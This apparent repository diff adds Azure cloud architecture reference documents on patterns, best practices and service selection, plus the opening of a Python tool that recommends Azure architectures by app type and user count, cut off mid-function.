| Service | Purpose | Configuration |
|---------|---------|---------------|
| Azure Functions | Event handlers, APIs | Consumption plan (dev), Premium (prod) |
| Event Grid | Event routing and fan-out | System + custom topics |
| Service Bus | Reliable messaging with DLQ | Basic or Standard, queues + topics |
| Cosmos DB | Low-latency data store | Serverless (dev), autoscale (prod) |
| Blob Storage | File processing triggers | Lifecycle policies |
| Application Insights | Function monitoring | Sampling at 5-10% for high volume |
### Durable Functions Patterns
Use Durable Functions for orchestration instead of building custom state machines:
| Pattern | Use Case | Example |
|---------|----------|---------|
| Function chaining | Sequential steps | Order: validate -> charge -> fulfill -> notify |
| Fan-out/fan-in | Parallel processing | Process all images in a batch, aggregate results |
| Async HTTP APIs | Long-running operations | Start job, poll for status, return result |
| Monitor | Periodic polling | Check external API until condition met |
| Human interaction | Approval workflows | Send approval email, wait for response with timeout |
### Cost Estimate
| Component | Dev | Production |
|-----------|-----|-----------|
| Functions (Consumption) | $0 (1M free) | $5-30 |
| Event Grid | $0 | $0-5 |
| Service Bus | $0 (Basic) | $10-30 |
| Cosmos DB | $0 (serverless free tier) | $25-150 |
| Blob Storage | $1 | $5-15 |
| Application Insights | $0 | $5-15 |
| **Total** | **~$1** | **~$50-245** |
---
## Pattern 4: Data Pipeline
### Architecture
```
┌──────────┐ ┌──────────┐
│ IoT/Apps │ │ Batch │
│ (events) │ │ (files) │
└────┬─────┘ └────┬─────┘
│ │
┌────▼─────┐ ┌────▼─────┐
│ Event │ │ Data │
│ Hubs │ │ Factory │
└────┬─────┘ └────┬─────┘
│ │
└────────┬───────┘
┌────────▼────────┐
│ Data Lake │
│ Storage Gen2 │
│ (raw/curated) │
└────────┬────────┘
┌────────▼────────┐
│ Synapse │
│ Analytics │
│ (SQL + Spark) │
└────────┬────────┘
┌────────▼────────┐
│ Power BI │
│ (dashboards) │
└─────────────────┘
```
### Services
| Service | Purpose | Configuration |
|---------|---------|---------------|
| Event Hubs | Real-time event ingestion | Standard, 2-8 partitions |
| Data Factory | Batch ETL orchestration | Managed, 90+ connectors |
| Data Lake Storage Gen2 | Raw and curated data lake | HNS enabled, lifecycle policies |
| Synapse Analytics | SQL and Spark analytics | Serverless SQL pool (pay-per-query) |
| Azure Functions | Lightweight processing | Triggered by Event Hubs or Blob |
| Power BI | Business intelligence | Pro ($10/user/month) |
### Data Lake Organization
```
data-lake/
├── raw/ # Landing zone — immutable source data
│ ├── source-system-a/
│ │ └── YYYY/MM/DD/ # Date-partitioned
│ └── source-system-b/
├── curated/ # Cleaned, validated, business-ready
│ ├── dimension/
│ └── fact/
├── sandbox/ # Ad-hoc exploration
└── archive/ # Cold storage (lifecycle policy target)
```
### Cost Estimate
| Component | Dev | Production |
|-----------|-----|-----------|
| Event Hubs (1 TU) | $22 | $44-176 |
| Data Factory | $0 (free tier) | $50-200 |
| Data Lake Storage | $5 | $20-80 |
| Synapse Serverless SQL | $5 | $50-300 |
| Azure Functions | $0 | $5-20 |
| Power BI Pro | $10/user | $10/user |
| **Total** | **~$42** | **~$180-800** |
---
## Pattern 5: Multi-Region Active-Active
### Architecture
```
┌──────────────┐
│ Azure Front │
│ Door (Global│
│ LB + WAF) │
└──┬────────┬──┘
│ │
┌──────────▼──┐ ┌──▼──────────┐
│ Region 1 │ │ Region 2 │
│ (East US) │ │ (West EU) │
│ │ │ │
│ App Service │ │ App Service │
│ + SQL │ │ + SQL │
│ + Redis │ │ + Redis │
└──────┬──────┘ └──────┬──────┘
│ │
┌──────▼───────────────▼──────┐
│ Cosmos DB │
│ (multi-region writes) │
│ Session consistency │
└─────────────────────────────┘
```
### Multi-Region Design Decisions
| Decision | Recommendation | Rationale |
|----------|---------------|-----------|
| Global load balancer | Front Door Premium | Built-in WAF, CDN, health probes, fastest failover |
| Database replication | Cosmos DB multi-write or SQL failover groups | Cosmos for global writes, SQL for relational needs |
| Session state | Azure Cache for Redis (per region) | Local sessions, avoid cross-region latency |
| Static content | Front Door CDN | Edge-cached, no origin required |
| DNS strategy | Front Door handles routing | No separate Traffic Manager needed |
| Failover | Automatic (Front Door health probes) | 10-30 second detection, automatic reroute |
### Azure SQL Failover Groups vs Cosmos DB Multi-Region
| Feature | SQL Failover Groups | Cosmos DB Multi-Region |
|---------|-------------------|----------------------|
| Replication | Async (RPO ~5s) | Sync or async (configurable) |
| Write region | Single primary | Multi-write capable |
| Failover | Automatic or manual (grace period, min 1 hour) | Automatic |
| Consistency | Strong (single writer) | 5 levels (session recommended) |
| Cost | 2x compute (active-passive) | Per-region RU/s charge |
| Best for | Relational data, transactions | Document data, global low-latency |
### Cost Impact
Multi-region typically costs 1.5-2x single region:
- Compute: 2x (running in both regions)
- Database: 1.5-2x (replication, multi-write)
- Networking: Additional cross-region data transfer (~$0.02-0.05/GB)
- Front Door Premium: ~$100-200/month
---
## Well-Architected Framework Alignment
Every architecture pattern should address all five pillars of the Azure Well-Architected Framework.
### Reliability
- Deploy across Availability Zones (zone-redundant App Service, AKS, SQL)
- Enable health probes at every layer
- Implement retry policies with exponential backoff (Polly for .NET, tenacity for Python)
- Define RPO/RTO and test disaster recovery quarterly
- Use Azure Chaos Studio for fault injection testing
### Security
- Entra ID for all human and service authentication
- Managed Identity for all Azure service-to-service communication
- Key Vault for secrets, certificates, and encryption keys — no secrets in code or config
- Private Endpoints for all PaaS services in production
- Microsoft Defender for Cloud for threat detection and compliance
### Cost Optimization
- Use serverless and consumption-based services where possible
- Auto-pause Azure SQL in dev/test (serverless tier)
- Spot VMs for fault-tolerant AKS node pools
- Reserved Instances for steady-state production workloads (1-year = 35% savings)
- Azure Advisor cost recommendations — review weekly
- Set budgets and alerts at subscription and resource group level
### Operational Excellence
- Bicep for all infrastructure (no manual portal deployments)
- GitOps for AKS (Flux or ArgoCD)
- Deployment slots or blue-green for zero-downtime deploys
- Centralized logging in Log Analytics with standardized KQL queries
- Azure DevOps or GitHub Actions for CI/CD with workload identity federation
### Performance Efficiency
- Application Insights for distributed tracing and performance profiling
- Azure Cache for Redis for session state and hot-path caching
- Front Door for edge caching and global acceleration
- Autoscale rules on compute (CPU, memory, HTTP queue length)
- Load testing with Azure Load Testing before production launch

View File

@@ -0,0 +1,337 @@
# Azure Best Practices
Production-ready practices for naming, tagging, security, networking, monitoring, and disaster recovery on Azure.
---
## Table of Contents
- [Naming Conventions](#naming-conventions)
- [Tagging Strategy](#tagging-strategy)
- [RBAC and Least Privilege](#rbac-and-least-privilege)
- [Network Security](#network-security)
- [Monitoring and Alerting](#monitoring-and-alerting)
- [Disaster Recovery](#disaster-recovery)
- [Common Pitfalls](#common-pitfalls)
---
## Naming Conventions
Follow the Azure Cloud Adoption Framework (CAF) naming convention for consistency and automation.
### Format
```
<resource-type>-<workload>-<environment>-<region>-<instance>
```
### Examples
| Resource | Naming Pattern | Example |
|----------|---------------|---------|
| Resource Group | rg-\<workload\>-\<env\> | rg-myapp-prod |
| App Service | app-\<workload\>-\<env\> | app-myapp-prod |
| App Service Plan | plan-\<workload\>-\<env\> | plan-myapp-prod |
| Azure SQL Server | sql-\<workload\>-\<env\> | sql-myapp-prod |
| Azure SQL Database | sqldb-\<workload\>-\<env\> | sqldb-myapp-prod |
| Storage Account | st\<workload\>\<env\> (no hyphens) | stmyappprod |
| Key Vault | kv-\<workload\>-\<env\> | kv-myapp-prod |
| AKS Cluster | aks-\<workload\>-\<env\> | aks-myapp-prod |
| Container Registry | cr\<workload\>\<env\> (no hyphens) | crmyappprod |
| Virtual Network | vnet-\<workload\>-\<env\> | vnet-myapp-prod |
| Subnet | snet-\<purpose\> | snet-app, snet-data |
| NSG | nsg-\<subnet-name\> | nsg-snet-app |
| Public IP | pip-\<resource\>-\<env\> | pip-agw-prod |
| Cosmos DB | cosmos-\<workload\>-\<env\> | cosmos-myapp-prod |
| Service Bus | sb-\<workload\>-\<env\> | sb-myapp-prod |
| Event Hubs | evh-\<workload\>-\<env\> | evh-myapp-prod |
| Log Analytics | log-\<workload\>-\<env\> | log-myapp-prod |
| Application Insights | ai-\<workload\>-\<env\> | ai-myapp-prod |
### Rules
- Lowercase only (some resources require it — be consistent everywhere)
- Hyphens as separators (except where disallowed: storage accounts, container registries)
- No longer than the resource type max length (e.g., storage accounts max 24 characters)
- Environment abbreviations: `dev`, `stg`, `prod`
- Region abbreviations: `eus` (East US), `weu` (West Europe), `sea` (Southeast Asia)
---
## Tagging Strategy
Tags enable cost allocation, ownership tracking, and automation. Apply to every resource.
### Required Tags
| Tag Key | Purpose | Example Values |
|---------|---------|---------------|
| environment | Cost splitting, policy targeting | dev, staging, production |
| app-name | Workload identification | myapp, data-pipeline |
| owner | Team or individual responsible | platform-team, jane.doe@company.com |
| cost-center | Finance allocation | CC-1234, engineering |
### Recommended Tags
| Tag Key | Purpose | Example Values |
|---------|---------|---------------|
| created-by | IaC or manual tracking | bicep, terraform, portal |
| data-classification | Security posture | public, internal, confidential |
| compliance | Regulatory requirements | hipaa, gdpr, sox |
| auto-shutdown | Dev/test cost savings | true, false |
### Enforcement
Use Azure Policy to enforce tagging:
```json
{
"if": {
"allOf": [
{ "field": "tags['environment']", "exists": "false" },
{ "field": "type", "notEquals": "Microsoft.Resources/subscriptions/resourceGroups" }
]
},
"then": { "effect": "deny" }
}
```
---
## RBAC and Least Privilege
### Principles
1. **Use built-in roles** before creating custom roles
2. **Assign roles to groups**, not individual users
3. **Scope to the narrowest level** — resource group or resource, not subscription
4. **Use Managed Identity** for service-to-service — never store credentials
5. **Enable Entra ID PIM** (Privileged Identity Management) for just-in-time admin access
### Common Role Assignments
| Persona | Scope | Role |
|---------|-------|------|
| Developer | Resource Group (dev) | Contributor |
| Developer | Resource Group (prod) | Reader |
| CI/CD pipeline | Resource Group | Contributor (via workload identity) |
| App Service | Key Vault | Key Vault Secrets User |
| App Service | Azure SQL | SQL DB Contributor (or Entra auth) |
| AKS pod | Cosmos DB | Cosmos DB Built-in Data Contributor |
| Security team | Subscription | Security Reader |
| Platform team | Subscription | Owner (with PIM) |
### Workload Identity Federation
For CI/CD pipelines (GitHub Actions, Azure DevOps), use workload identity federation instead of service principal secrets:
```bash
# Create federated credential (GitHub Actions example)
az ad app federated-credential create \
--id <app-object-id> \
--parameters '{
"name": "github-main",
"issuer": "https://token.actions.githubusercontent.com",
"subject": "repo:org/repo:ref:refs/heads/main",
"audiences": ["api://AzureADTokenExchange"]
}'
```
---
## Network Security
### Defense in Depth
| Layer | Control | Implementation |
|-------|---------|---------------|
| Edge | DDoS + WAF | Azure DDoS Protection + Front Door WAF |
| Perimeter | Firewall | Azure Firewall or NVA for hub VNet |
| Network | Segmentation | VNet + subnets + NSGs |
| Application | Access control | Private Endpoints + Managed Identity |
| Data | Encryption | TLS 1.2+ in transit, CMK at rest |
### Private Endpoints
Every PaaS service in production must use Private Endpoints:
| Service | Private Endpoint Support | Private DNS Zone |
|---------|------------------------|------------------|
| Azure SQL | Yes | privatelink.database.windows.net |
| Cosmos DB | Yes | privatelink.documents.azure.com |
| Key Vault | Yes | privatelink.vaultcore.azure.net |
| Storage (Blob) | Yes | privatelink.blob.core.windows.net |
| Container Registry | Yes | privatelink.azurecr.io |
| Service Bus | Yes | privatelink.servicebus.windows.net |
| App Service | VNet Integration (outbound) + Private Endpoint (inbound) | privatelink.azurewebsites.net |
### NSG Rules Baseline
Every subnet should have an NSG. Start with deny-all inbound, then open only what is needed:
```
Priority Direction Action Source Destination Port
100 Inbound Allow Front Door App Subnet 443
200 Inbound Allow App Subnet Data Subnet 1433,5432
300 Inbound Allow VNet VNet Any (internal)
4096 Inbound Deny Any Any Any
```
### Application Gateway + WAF
For single-region web apps without Front Door:
- Application Gateway v2 with WAF enabled
- OWASP 3.2 rule set + custom rules
- Rate limiting per client IP
- Bot protection (managed rule set)
- SSL termination with Key Vault certificate
---
## Monitoring and Alerting
### Monitoring Stack
```
Application Insights (APM + distributed tracing)
Log Analytics Workspace (central log store)
Azure Monitor Alerts (metric + log-based)
Action Groups (email, Teams, PagerDuty, webhook)
```
### Essential Alerts
| Alert | Condition | Severity |
|-------|-----------|----------|
| App Service HTTP 5xx | > 10 in 5 minutes | Critical (Sev 1) |
| App Service response time | P95 > 2 seconds | Warning (Sev 2) |
| Azure SQL DTU/CPU | > 80% for 10 minutes | Warning (Sev 2) |
| Azure SQL deadlocks | > 0 | Warning (Sev 2) |
| Cosmos DB throttled requests | 429 count > 10 in 5 min | Warning (Sev 2) |
| AKS node CPU | > 80% for 10 minutes | Warning (Sev 2) |
| AKS pod restart count | > 5 in 10 minutes | Critical (Sev 1) |
| Key Vault access denied | > 0 | Critical (Sev 1) |
| Budget threshold | 80% of monthly budget | Warning (Sev 3) |
| Budget threshold | 100% of monthly budget | Critical (Sev 1) |
### KQL Queries for Troubleshooting
**App Service slow requests:**
```kql
requests
| where duration > 2000
| summarize count(), avg(duration), percentile(duration, 95) by name
| order by count_ desc
| take 10
```
**Failed dependencies (SQL, HTTP, etc.):**
```kql
dependencies
| where success == false
| summarize count() by type, target, resultCode
| order by count_ desc
```
**AKS pod errors:**
```kql
KubePodInventory
| where PodStatus != "Running" and PodStatus != "Succeeded"
| summarize count() by PodStatus, Namespace, Name
| order by count_ desc
```
### Application Insights Configuration
- Enable **distributed tracing** with W3C trace context
- Set **sampling** to 5-10% for high-volume production (100% for dev)
- Enable **profiler** for .NET applications
- Enable **snapshot debugger** for exception analysis
- Configure **availability tests** (URL ping every 5 minutes from multiple regions)
---
## Disaster Recovery
### RPO/RTO Mapping
| Tier | RPO | RTO | Strategy | Cost |
|------|-----|-----|----------|------|
| Tier 1 (critical) | < 5 minutes | < 1 hour | Active-active multi-region | 2x |
| Tier 2 (important) | < 1 hour | < 4 hours | Warm standby | 1.3x |
| Tier 3 (standard) | < 24 hours | < 24 hours | Backup and restore | 1.1x |
| Tier 4 (non-critical) | < 72 hours | < 72 hours | Rebuild from IaC | 1x |
### Backup Strategy
| Service | Backup Method | Retention |
|---------|--------------|-----------|
| Azure SQL | Automated backups | 7 days (short-term), 10 years (long-term) |
| Cosmos DB | Continuous backup + point-in-time restore | 7-30 days |
| Blob Storage | Soft delete + versioning + geo-redundant | 30 days soft delete |
| AKS | Velero backup to Blob Storage | 7 days |
| Key Vault | Soft delete + purge protection | 90 days |
| App Service | Manual or automated (Backup and Restore feature) | Custom |
### Storage Redundancy
| Redundancy | Regions | Durability | Use Case |
|-----------|---------|-----------|----------|
| LRS | 1 (3 copies) | 11 nines | Dev/test, easily recreatable data |
| ZRS | 1 (3 AZs) | 12 nines | Production, zone failure protection |
| GRS | 2 (6 copies) | 16 nines | Business-critical, regional failure protection |
| GZRS | 2 (3 AZs + secondary) | 16 nines | Most critical data, best protection |
**Default to ZRS for production.** Use GRS/GZRS only when cross-region DR is required.
### DR Testing Checklist
- [ ] Verify automated backups are running and retention is correct
- [ ] Test point-in-time restore for databases (monthly)
- [ ] Test regional failover for SQL failover groups (quarterly)
- [ ] Validate IaC can recreate full environment from scratch
- [ ] Test Front Door failover by taking down primary region health endpoint
- [ ] Document and test runbook for manual failover steps
- [ ] Measure actual RTO vs target during DR drill
---
## Common Pitfalls
### Cost Pitfalls
| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| No budget alerts | Unexpected bills | Set alerts at 50%, 80%, 100% on day one |
| Premium tier in dev/test | 3-5x overspend | Use Basic/Free tiers, auto-shutdown VMs |
| Orphaned resources | Silent monthly charges | Tag everything, review Cost Management weekly |
| Ignoring Reserved Instances | 35-55% overpay on steady workloads | Review Azure Advisor quarterly |
| Over-provisioned Cosmos DB RU/s | Paying for unused throughput | Use autoscale or serverless |
### Security Pitfalls
| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| Secrets in App Settings | Leaked credentials | Use Key Vault references |
| Public PaaS endpoints | Exposed attack surface | Private Endpoints + VNet integration |
| Contributor role on subscription | Overprivileged access | Scope to resource group, use PIM |
| No diagnostic settings | Blind to attacks | Enable on every resource from day one |
| SQL password authentication | Weak identity model | Entra-only auth, Managed Identity |
### Operational Pitfalls
| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| Manual portal deployments | Drift, no audit trail | Bicep for everything, block portal changes via Policy |
| No health checks configured | Silent failures | /health endpoint, Front Door probes, App Service checks |
| Single region deployment | Single point of failure | At minimum, use Availability Zones |
| No tagging strategy | Cannot track costs/ownership | Enforce via Azure Policy from day one |
| Ignoring Azure Advisor | Missed optimizations | Weekly review, enable email digest |

View File

@@ -0,0 +1,250 @@
# Azure Service Selection Guide
Quick reference for choosing the right Azure service based on workload requirements.
---
## Table of Contents
- [Compute Services](#compute-services)
- [Database Services](#database-services)
- [Storage Services](#storage-services)
- [Messaging and Events](#messaging-and-events)
- [Networking](#networking)
- [Security and Identity](#security-and-identity)
- [Monitoring and Observability](#monitoring-and-observability)
---
## Compute Services
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Event-driven, short tasks (<10 min) | Azure Functions (Consumption) |
| Event-driven, longer tasks (<30 min) | Azure Functions (Premium) |
| Containerized apps, simple deployment | Azure Container Apps |
| Full Kubernetes control | AKS |
| Traditional web apps (PaaS) | App Service |
| GPU, HPC, custom OS | Virtual Machines |
| Batch processing | Azure Batch |
| Simple container from source | App Service (container) |
### Azure Functions vs Container Apps vs AKS vs App Service
| Feature | Functions | Container Apps | AKS | App Service |
|---------|-----------|---------------|-----|-------------|
| Scale to zero | Yes (Consumption) | Yes | No (min 1 node) | No |
| Kubernetes | No | Built on K8s (abstracted) | Full K8s | No |
| Cold start | 1-5s (Consumption) | 0-2s | N/A | N/A |
| Max execution time | 10 min (Consumption), 30 min (Premium) | Unlimited | Unlimited | Unlimited |
| Languages | C#, JS, Python, Java, PowerShell (Go/Rust via custom handlers) | Any container | Any container | .NET, Node, Python, Java, PHP, Ruby |
| Pricing model | Per-execution | Per vCPU-second | Per node | Per plan |
| Best for | Event handlers, APIs, scheduled jobs | Microservices, APIs | Complex platforms, multi-team | Web apps, APIs, mobile backends |
| Operational complexity | Low | Low-Medium | High | Low |
| Dapr integration | No | Built-in | Manual | No |
| KEDA autoscaling | No | Built-in | Manual install | No |
**Opinionated recommendation:**
- **Start with App Service** for web apps and APIs — simplest operational model.
- **Use Container Apps** for microservices — serverless containers without Kubernetes complexity.
- **Use AKS** only when you need full Kubernetes API access (custom operators, service mesh, multi-cluster).
- **Use Functions** for event-driven glue (queue processing, webhooks, scheduled jobs).
### VM Size Selection
| Workload | Series | Example | vCPUs | RAM | Use Case |
|----------|--------|---------|-------|-----|----------|
| General purpose | Dv5/Dsv5 | Standard_D4s_v5 | 4 | 16 GB | Web servers, small databases |
| Memory optimized | Ev5/Esv5 | Standard_E8s_v5 | 8 | 64 GB | Databases, caching, analytics |
| Compute optimized | Fv2/Fsv2 | Standard_F8s_v2 | 8 | 16 GB | Batch processing, ML inference |
| Storage optimized | Lsv3 | Standard_L8s_v3 | 8 | 64 GB | Data warehouses, large databases |
| GPU | NCv3/NDv4 | Standard_NC6s_v3 | 6 | 112 GB | ML training, rendering |
**Always use v5 generation or newer** — better price-performance than older series.
---
## Database Services
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Relational, SQL Server compatible | Azure SQL Database |
| Relational, PostgreSQL | Azure Database for PostgreSQL Flexible Server |
| Relational, MySQL | Azure Database for MySQL Flexible Server |
| Document / multi-model, global distribution | Cosmos DB |
| Key-value cache, sessions | Azure Cache for Redis |
| Time-series, IoT data | Azure Data Explorer (Kusto) |
| Full-text search | Azure AI Search (formerly Cognitive Search) |
| Graph database | Cosmos DB (Gremlin API) |
### Cosmos DB vs Azure SQL vs PostgreSQL
| Feature | Cosmos DB | Azure SQL | PostgreSQL Flexible |
|---------|-----------|-----------|-------------------|
| Data model | Document, key-value, graph, table, column | Relational | Relational + JSON |
| Global distribution | Native multi-region writes | Geo-replication (async) | Read replicas |
| Consistency | 5 levels (strong to eventual) | Strong | Strong |
| Scaling | RU/s (auto or manual) | DTU or vCore | vCore |
| Serverless tier | Yes | Yes | No |
| Best for | Global apps, variable schema, low-latency reads | OLTP, complex queries, transactions | PostgreSQL ecosystem, extensions |
| Pricing model | Per RU/s + storage | Per DTU or per vCore | Per vCore |
| Managed backups | Continuous + point-in-time | Automatic + long-term retention | Automatic |
**Opinionated recommendation:**
- **Default to Azure SQL Serverless** for most relational workloads — auto-pause saves money in dev/staging.
- **Use PostgreSQL Flexible** when you need PostGIS, full-text search, or specific PostgreSQL extensions.
- **Use Cosmos DB** only when you need global distribution, sub-10ms latency, or flexible schema.
- **Never use Cosmos DB** for workloads that need complex joins or transactions across partitions.
### Azure SQL Tier Selection
| Tier | Use Case | Compute | Cost Range |
|------|----------|---------|------------|
| Basic / S0 | Dev/test, tiny workloads | 5 DTUs | $5/month |
| General Purpose (Serverless) | Variable workloads, dev/staging | 0.5-40 vCores (auto-pause) | $40-800/month |
| General Purpose (Provisioned) | Steady production workloads | 2-80 vCores | $150-3000/month |
| Business Critical | High IOPS, low latency, readable secondary | 2-128 vCores | $400-8000/month |
| Hyperscale | Large databases (>4 TB), instant scaling | 2-128 vCores | $200-5000/month |
---
## Storage Services
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Unstructured data (files, images, backups) | Blob Storage |
| File shares (SMB/NFS) | Azure Files |
| High-performance file shares | Azure NetApp Files |
| Data Lake (analytics, big data) | Data Lake Storage Gen2 |
| Disk storage for VMs | Managed Disks |
| Queue-based messaging (simple) | Queue Storage |
| Table data (simple key-value) | Table Storage (or Cosmos DB Table API) |
### Blob Storage Tiers
| Tier | Access Pattern | Cost (per GB/month) | Access Cost | Use Case |
|------|---------------|---------------------|-------------|----------|
| Hot | Frequent access | $0.018 | Low | Active data, web content |
| Cool | Infrequent (30+ days) | $0.01 | Medium | Backups, older data |
| Cold | Rarely accessed (90+ days) | $0.0036 | Higher | Compliance archives |
| Archive | Almost never (180+ days) | $0.00099 | High (rehydrate required) | Long-term retention |
**Always set lifecycle management policies.** Rule of thumb: Hot for 30 days, Cool for 90 days, Cold or Archive after that.
---
## Messaging and Events
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Pub/sub, event routing, reactive | Event Grid |
| Reliable message queues, transactions | Service Bus |
| High-throughput event streaming | Event Hubs |
| Simple task queues | Queue Storage |
| IoT device telemetry | IoT Hub |
### Event Grid vs Service Bus vs Event Hubs
| Feature | Event Grid | Service Bus | Event Hubs |
|---------|-----------|-------------|------------|
| Pattern | Pub/Sub events | Message queue / topic | Event streaming |
| Delivery | At-least-once | At-least-once (peek-lock) | At-least-once (partitioned) |
| Ordering | No guarantee | FIFO (sessions) | Per partition |
| Max message size | 1 MB | 256 KB (Standard), 100 MB (Premium) | 1 MB (Standard), 20 MB (Premium) |
| Retention | 24 hours | 14 days (Standard) | 1-90 days |
| Throughput | Millions/sec | Thousands/sec | Millions/sec |
| Best for | Reactive events, webhooks | Business workflows, commands | Telemetry, logs, analytics |
| Dead letter | Yes | Yes | Via capture to storage |
**Opinionated recommendation:**
- **Event Grid** for reactive, fan-out scenarios (blob uploaded, resource created, custom events).
- **Service Bus** for reliable business messaging (orders, payments, workflows). Use topics for pub/sub, queues for point-to-point.
- **Event Hubs** for high-volume telemetry, log aggregation, and streaming analytics.
---
## Networking
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Global HTTP load balancing + CDN + WAF | Azure Front Door |
| Regional Layer 7 load balancing + WAF | Application Gateway |
| Regional Layer 4 load balancing | Azure Load Balancer |
| DNS management | Azure DNS |
| DNS-based global traffic routing | Traffic Manager |
| Private connectivity to PaaS | Private Endpoints |
| Site-to-site VPN | VPN Gateway |
| Dedicated private connection | ExpressRoute |
| Outbound internet from VNet | NAT Gateway |
| DDoS protection | Azure DDoS Protection |
### Front Door vs Application Gateway vs Load Balancer
| Feature | Front Door | Application Gateway | Load Balancer |
|---------|-----------|-------------------|--------------|
| Layer | 7 (HTTP/HTTPS) | 7 (HTTP/HTTPS) | 4 (TCP/UDP) |
| Scope | Global | Regional | Regional |
| WAF | Yes (Premium) | Yes (v2) | No |
| SSL termination | Yes | Yes | No |
| CDN | Built-in | No | No |
| Health probes | Yes | Yes | Yes |
| Best for | Global web apps, multi-region | Single-region web apps | TCP/UDP workloads, internal LB |
---
## Security and Identity
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| User authentication | Entra ID (Azure AD) |
| B2C customer identity | Entra External ID (Azure AD B2C) |
| Secrets, keys, certificates | Key Vault |
| Service-to-service auth | Managed Identity |
| Network access control | NSGs + Private Endpoints |
| Web application firewall | Front Door WAF or App Gateway WAF |
| Threat detection | Microsoft Defender for Cloud |
| Policy enforcement | Azure Policy |
| Privileged access management | Entra ID PIM |
### Managed Identity Usage
| Scenario | Configuration |
|----------|---------------|
| App Service accessing SQL | System-assigned MI + Azure SQL Entra auth |
| Functions accessing Key Vault | System-assigned MI + Key Vault RBAC |
| AKS pods accessing Cosmos DB | Workload Identity + Cosmos DB RBAC |
| VM accessing Storage | System-assigned MI + Storage RBAC |
| DevOps pipeline deploying | Workload Identity Federation (no secrets) |
**Rule: Every Azure service that supports Managed Identity should use it.** No connection strings with passwords, no service principal secrets in config.
---
## Monitoring and Observability
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Application performance monitoring | Application Insights |
| Log aggregation and queries | Log Analytics (KQL) |
| Metrics and alerts | Azure Monitor |
| Dashboards | Azure Dashboard or Grafana (managed) |
| Distributed tracing | Application Insights (OpenTelemetry) |
| Cost monitoring | Cost Management + Budgets |
| Security monitoring | Microsoft Defender for Cloud |
| Compliance monitoring | Azure Policy + Regulatory Compliance |
**Every resource should have diagnostic settings** sending logs and metrics to a Log Analytics workspace. Non-negotiable for production.

View File

@@ -0,0 +1,592 @@
#!/usr/bin/env python3
"""
Azure architecture design and service recommendation tool.
Generates architecture patterns based on application requirements.
Usage:
python architecture_designer.py --app-type web_app --users 10000
python architecture_designer.py --app-type microservices --users 50000 --requirements '{"compliance": ["HIPAA"]}'
python architecture_designer.py --app-type serverless --users 5000 --json
"""
import argparse
import json
import sys
from typing import Dict, List, Any
# ---------------------------------------------------------------------------
# Azure service catalog used by the designer
# ---------------------------------------------------------------------------
# Maps application type -> user-count bucket ("small"/"medium"/"large", see
# _size_bucket) -> pattern key understood by PATTERN_DISPATCH.
ARCHITECTURE_PATTERNS = {
    "web_app": {
        "small": "app_service_web",
        "medium": "app_service_scaled",
        "large": "multi_region_web",
    },
    "saas_platform": {
        "small": "app_service_web",
        "medium": "aks_microservices",
        "large": "multi_region_web",
    },
    "mobile_backend": {
        "small": "serverless_functions",
        "medium": "app_service_web",
        "large": "aks_microservices",
    },
    "microservices": {
        "small": "container_apps",
        "medium": "aks_microservices",
        "large": "aks_microservices",
    },
    "data_pipeline": {
        "small": "serverless_data",
        "medium": "synapse_pipeline",
        "large": "synapse_pipeline",
    },
    # Serverless pattern is size-independent: Functions scale automatically.
    "serverless": {
        "small": "serverless_functions",
        "medium": "serverless_functions",
        "large": "serverless_functions",
    },
}
def _size_bucket(users: int) -> str:
if users < 10000:
return "small"
if users < 100000:
return "medium"
return "large"
# ---------------------------------------------------------------------------
# Pattern builders
# ---------------------------------------------------------------------------
def _app_service_web(users: int, reqs: Dict) -> Dict[str, Any]:
    """Build the App Service web-app pattern recommendation.

    Args:
        users: Expected user count. NOTE(review): currently unused here —
            size selection happens in the caller via ``_size_bucket``.
        reqs: Requirements dict; reads optional ``budget_monthly_usd``.

    Returns:
        Recommendation dict (pattern, service stack, cost estimate/breakdown,
        pros/cons, scaling characteristics).
    """
    budget = reqs.get("budget_monthly_usd", 500)
    return {
        "recommended_pattern": "app_service_web",
        "description": "Azure App Service with managed SQL and CDN",
        "use_case": "Web apps, SaaS platforms, startup MVPs",
        "service_stack": [
            "App Service (Linux P1v3)",
            "Azure SQL Database (Serverless GP_S_Gen5_2)",
            "Azure Front Door",
            "Azure Blob Storage",
            "Key Vault",
            "Entra ID + RBAC",
            "Application Insights",
        ],
        # Headline estimate is capped at the caller-supplied budget.
        "estimated_monthly_cost_usd": min(280, budget),
        "cost_breakdown": {
            "App Service P1v3": "$70-95",
            "Azure SQL Serverless": "$40-120",
            "Front Door": "$35-55",
            "Blob Storage": "$5-15",
            "Key Vault": "$1-5",
            "Application Insights": "$5-20",
        },
        "pros": [
            "Managed platform — no OS patching",
            "Built-in autoscale and deployment slots",
            "Easy CI/CD with GitHub Actions or Azure DevOps",
            "Custom domains and TLS certificates included",
            "Integrated authentication (Easy Auth)",
        ],
        "cons": [
            "Less control than VMs or containers",
            "Platform constraints for exotic runtimes",
            "Cold start on lower-tier plans",
            "Outbound IP shared unless isolated tier",
        ],
        "scaling": {
            "users_supported": "1k - 100k",
            "requests_per_second": "100 - 10,000",
            "method": "App Service autoscale rules (CPU, memory, HTTP queue)",
        },
    }
def _aks_microservices(users: int, reqs: Dict) -> Dict[str, Any]:
    """Build the AKS microservices pattern recommendation.

    Args:
        users: Expected user count. NOTE(review): unused by this builder;
            sizing is decided by the caller.
        reqs: Requirements dict; reads optional ``budget_monthly_usd``.

    Returns:
        Recommendation dict in the same shape as the other pattern builders.
    """
    budget = reqs.get("budget_monthly_usd", 2000)
    return {
        "recommended_pattern": "aks_microservices",
        "description": "Microservices on AKS with API Management and Cosmos DB",
        "use_case": "Complex SaaS, multi-team microservices, high-scale platforms",
        "service_stack": [
            "AKS (3 node pools: system, app, jobs)",
            "API Management (Standard v2)",
            "Cosmos DB (multi-model)",
            "Service Bus (Standard)",
            "Azure Container Registry",
            "Azure Monitor + Application Insights",
            "Key Vault",
            "Entra ID workload identity",
        ],
        # Headline estimate is capped at the caller-supplied budget.
        "estimated_monthly_cost_usd": min(1200, budget),
        "cost_breakdown": {
